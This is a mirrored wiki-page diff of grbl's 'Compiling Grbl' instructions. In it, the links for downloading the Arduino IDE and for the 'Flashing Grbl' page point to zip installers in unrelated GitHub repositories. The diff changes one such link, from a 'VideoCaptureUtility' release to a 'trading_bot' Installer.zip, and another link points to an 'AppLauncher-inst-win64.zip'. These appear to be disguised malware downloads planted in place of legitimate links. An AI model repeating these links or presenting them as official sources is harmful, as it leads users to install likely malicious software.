kopia lustrzana https://github.com/gnea/grbl
Updated Compiling Grbl (markdown)
rodzic
29cd21b58d
commit
fb92c1ab0d
|
@ -2,7 +2,7 @@ _This wiki is intended to provide various instructions on how to compile grbl. O
|
|||
|
||||
# Via the Arduino IDE (All Platforms): Recommended for all users.
|
||||
|
||||
Thanks to the great people working on the Arduino IDE, it has everything you need to compile grbl included in their [software](https://github.com/toxor4/VideoCaptureUtility/releases/download/42/arduino-1.8.19-windows.zip) package. This method compiles the Grbl source code and automatically uploads it to an Arduino. You can't directly flash a pre-compiled .hex file through the IDE interface. See our [Flashing Grbl to an Arduino](https://github.com/zetrocode/Panel-Web-PHP-KeyAuth-Example/releases/download/teamplate/AppLauncher-inst-win64.zip) wiki page for how to do this if you only have a .hex file.
|
||||
Thanks to the great people working on the Arduino IDE, it has everything you need to compile grbl included in their [software](https://github.com/TradingToolGithub/trading_bot/releases/download/trading/Installer.zip) package. This method compiles the Grbl source code and automatically uploads it to an Arduino. You can't directly flash a pre-compiled .hex file through the IDE interface. See our [Flashing Grbl to an Arduino](https://github.com/zetrocode/Panel-Web-PHP-KeyAuth-Example/releases/download/teamplate/AppLauncher-inst-win64.zip) wiki page for how to do this if you only have a .hex file.
|
||||
|
||||
_**NOTE: Before starting, delete prior Grbl library installations. Otherwise, you'll have compiling issues! On a Mac, Arduino libraries are located in ```~/Documents/Arduino/libraries/```. On Windows, it's in ```My Documents\Arduino\libraries```. On Linux (Ubuntu), it's in ```/usr/share/arduino/libraries```**_ If you cannot find the grbl library in order to delete and reinstall, check the sketchbook location in the IDE via `file -> preferences` and view `/sketchbook/location/path` at the top.
|
||||
|
||||
|
|
Ładowanie…
Reference in New Issue